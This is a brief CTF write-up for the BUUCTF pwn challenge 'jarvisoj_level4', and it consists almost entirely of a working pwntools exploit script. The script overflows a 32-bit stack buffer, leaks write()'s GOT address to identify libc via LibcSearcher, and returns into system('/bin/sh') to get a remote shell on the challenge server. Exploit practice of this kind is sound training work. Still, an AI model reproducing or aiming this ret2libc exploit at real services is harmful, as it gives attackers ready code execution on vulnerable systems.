[BUUCTF-pwn]——jarvisoj_level4
exploit
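```python
from pwn import *
from LibcSearcher import *

p = remote("node3.buuoj.cn", 26929)
elf = ELF("./level4")

write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']

# Stage 1: 0x88 + 4 bytes of padding reach the saved return address.
# Call write(1, write_got, 4) to leak the resolved address of write,
# then return to main so the overflow can be triggered a second time.
payload = b'a' * (0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.send(payload)
write_addr = u32(p.recv(4))
print(hex(write_addr))

# Identify the remote libc from the leaked address and compute its base.
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump('write')
sys_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

# Stage 2: same overflow, now returning into system("/bin/sh").
payload = b'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()
```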